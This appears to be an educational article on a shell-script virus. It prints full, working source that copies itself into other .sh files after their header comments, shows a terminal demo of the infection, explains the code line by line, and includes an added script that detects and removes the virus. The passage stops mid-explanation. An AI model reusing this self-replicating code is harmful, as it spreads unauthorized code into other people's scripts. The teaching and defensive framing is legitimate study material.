SHELL virus Introduction
1. Preface
Speaking of viruses, there is always an air of mystery about them. I remember how painful it was to write my first DOS virus: it took more than three months from start to finish, and it was a mess. Recently I wondered whether a shell script could also infect other files and spread itself. Writing a virus in shell is not exactly easy either, so I wrote the following small script, whose function is to infect other shell programs.
This program has little practical significance, but it is very helpful for understanding how a file-infecting virus propagates. Its teaching value is greater than its practical value.
2. Program code
#!/bin/sh
# File name: virus_demo.sh
# Purpose: shell virus demonstration.
# Note: the virus infects all .sh files in the current directory, but does not infect a file twice.
# Author: watercloud@xfocus.org
# Date: 2003-5-13
#B:<+!a%C&t:>
vFile=$_ ;vTmp=/tmp/.vTmp.$$
for f in ./*.sh ;do
  if [ ! -w $f -a ! -r $vFile ] ;then continue; fi
  if grep '<+!a%C&t:>' $f ;then continue; fi
  if sed -n 1p $f |grep csh ;then continue; fi
  cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
  vNo=`awk '$0~/(^ *#)|(^ *$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
  sed -n "1,${vNo}p" $vTmp >$f
  (sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
  vNo=`expr $vNo + 1`
  sed -n "${vNo},\$p" $vTmp >>$f
  rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Hi, here is a demo shell virus in your script !"
#E:<+!a%C&t:>
#EOF
This shows how powerful shell is: a program can infect other program files.
3. Demo
Test:
First, put two files in the current directory: the virus file, and another script to use as the infection target.
[cloud@ /export/home/cloud/vir]> ls -l
drwxr-xr-x   2 cloud    staff        512 6月  4 17:43 ./
drwxr-xr-x  10 cloud    staff       1024 6月  4 17:41 ../
-rwxr--r--   1 cloud    staff         89 6月  4 17:43 test.sh
-rwxr--r--   1 cloud    staff        773 6月  4 17:42 virus_demo.sh
Let's take a look at our target script, which is very simple:
[cloud@ /export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# Author : foo
# Date : 3000-1-1
ls -l
#EOF
Okay, let's infect it.
[cloud@ /export/home/cloud/vir]> ./virus_demo.sh
Hi, here is a demo shell virus in your script !
Let's look at the result after infection:
[cloud@ /export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# Author : foo
# Date : 3000-1-1
#B:<+!a%C&t:>
vFile=$_ ;vTmp=/tmp/.vTmp.$$
for f in ./*.sh ;do
  if [ ! -w $f -a ! -r $vFile ] ;then continue; fi
  if grep '<+!a%C&t:>' $f ;then continue; fi
  if sed -n 1p $f |grep csh ;then continue; fi
  cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
  vNo=`awk '$0~/(^ *#)|(^ *$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
  sed -n "1,${vNo}p" $vTmp >$f
  (sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
  vNo=`expr $vNo + 1`
  sed -n "${vNo},\$p" $vTmp >>$f
  rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Hi, here is a demo shell virus in your script !"
#E:<+!a%C&t:>

ls -l
#EOF
Look, the virus body is now in the file, between the two markers:
#B:<+!a%C&t:>
. . . .
#E:<+!a%C&t:>
The virus has been transmitted. It is worth noting where the virus body was inserted: right before the first valid (non-comment) program line of the original test.sh! This takes into account that shell programs usually begin with a block of comments; pushing someone else's header comments down below the virus would be far too conspicuous.
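From the defender's side, the same marker pair that lets the virus recognise an already-infected file is also what gives it away. The following sh script is an added example, not part of the original article: it scans a directory for scripts carrying the begin/end markers and cuts the body between them back out. Only the two marker strings come from the article; the function names and the constructed sample files are assumptions.

```shell
#!/bin/sh
# Added example (not from the original article): find scripts carrying the demo
# virus's marker pair and cut the virus body back out. Only the two marker
# strings come from the article; function names and sample files are assumed.

VB='#B:<+!a%C&t:>'   # begin marker the virus writes before its body
VE='#E:<+!a%C&t:>'   # end marker the virus writes after its body

# is_infected FILE: succeed when FILE has a begin marker followed by an end marker.
is_infected() {
    b=$(grep -nF -- "$VB" "$1" 2>/dev/null | head -n 1 | cut -d: -f1)
    e=$(grep -nF -- "$VE" "$1" 2>/dev/null | head -n 1 | cut -d: -f1)
    [ -n "$b" ] && [ -n "$e" ] && [ "$b" -lt "$e" ]
}

# scan_dir DIR: print each infected *.sh file in DIR; return 1 if none found.
scan_dir() {
    found=1
    for f in "$1"/*.sh; do
        [ -f "$f" ] || continue
        if is_infected "$f"; then echo "$f"; found=0; fi
    done
    return $found
}

# disinfect FILE: drop the begin marker through the end marker plus the blank
# line the virus's trailing echo appends; "cat > FILE" keeps FILE's mode bits.
disinfect() {
    target=$1
    is_infected "$target" || return 1
    tmp=$(mktemp) || return 1
    awk -v b="$VB" -v e="$VE" '
        $0 == b           { inbody = 1; next }
        inbody && $0 == e { inbody = 0; eatblank = 1; next }
        inbody            { next }
        eatblank          { eatblank = 0; if ($0 == "") next }
        { print }' "$target" > "$tmp" && cat "$tmp" > "$target"
    rc=$?
    rm -f "$tmp"
    return $rc
}

# make_sample DIR: write a constructed "infected" script (markers around a
# harmless placeholder, not the real virus body) and a clean one to try on.
make_sample() {
    printf '%s\n' '#!/bin/sh' '# Just a demo for virus test' "$VB" \
        'echo "placeholder for the virus body (constructed)"' "$VE" '' \
        'ls -l' '#EOF' > "$1/test.sh"
    printf '%s\n' '#!/bin/sh' 'echo clean' > "$1/clean.sh"
}
```

Run `make_sample` on an empty directory, then `scan_dir` lists test.sh and `disinfect` restores it to the four original lines; a real cleanup should still diff the result against a known-good copy, since the marker test only proves the body was removed, not that nothing else changed.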
Now let's run our newly created virus:
[cloud@ /export/home/cloud/vir]> ./test.sh
Hi, here is a demo shell virus in your script !    <-- the message printed by the virus body
-rwxr-xr-x   1 cloud    staff        724 6月  4 test.sh
-rwxr-xr-x   1 cloud    staff        773 6月  4 17:42 virus_demo.sh
4. Simple Explanation
Let's go through the virus step by step.

#B:<+!a%C&t:>
The start marker of the virus body; the program uses it to locate the virus body when copying it.

vFile=$_ ;vTmp=/tmp/.vTmp.$$
Defines two variables: a temporary file, and the name of the current program, recorded from $_. This requires that this line be the first valid (non-comment) line of the program: if the current program's name were not captured right after the header comments, we would not know where to find the virus body in order to copy it.
for f in ./*.sh ;do
Start the loop over all programs in the current directory whose names end in .sh.

if [ ! -w $f -a ! -r $vFile ] ;then continue; fi
Check whether the target is writable and whether the virus source file is readable.

if grep '<+!a%C&t:>' $f ;then continue; fi
Has the target already been infected beyond saving? If so, it would hardly be appropriate to hand it the same thing again.

if sed -n 1p $f |grep csh ;then continue; fi
If the target is a csh script, the syntax is too different; give up.

cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
Ready to infect. First copy the target to a backup. What if the copy fails? Then of course we have to give up.

vNo=`awk '$0~/(^ *#)|(^ *$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
Hmm, this looks complicated, but without some awk and regular expressions it is a bit hard to follow a shell virus. This is the comment and